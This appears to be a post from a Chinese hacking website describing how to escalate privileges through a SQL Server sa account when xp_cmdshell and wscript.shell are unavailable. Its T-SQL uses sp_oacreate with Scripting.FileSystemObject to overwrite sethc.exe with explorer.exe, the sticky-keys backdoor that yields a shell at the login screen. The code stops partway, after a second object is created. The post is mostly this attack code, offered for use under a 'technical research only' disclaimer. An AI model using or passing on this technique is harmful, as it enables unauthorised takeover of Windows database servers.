类型:未知 - 返回首页

主题描述:sa无xp_cmdshell下提升权限简单方法
来源:网络   提交:admin   时间:2013-11-24   点击:326

在用exec sp_oacreate ''wscript.shell''也没办法的情况下。。可用此方法
  (很多服务器都把''wscript.shell''给删了。)
  上网找了些资料,得到下面方法:
  复制文件:
  declare @o int
  exec sp_oacreate ''scripting.filesystemobject'', @o out
  exec sp_oamethod @o, ''copyfile'',null,''c:\windows\explorer.exe'' ,''c:\windows\system32\sethc.exe'';
  declare @oo int
  exec sp_oacreate ''scripting.filesystemobject'', @oo out

本站所有内容 仅供技术研究
如有任何建议与意见请发送至:[email protected]
Copyright (C) 2006-2025 www.hac-ker.com All rights reserved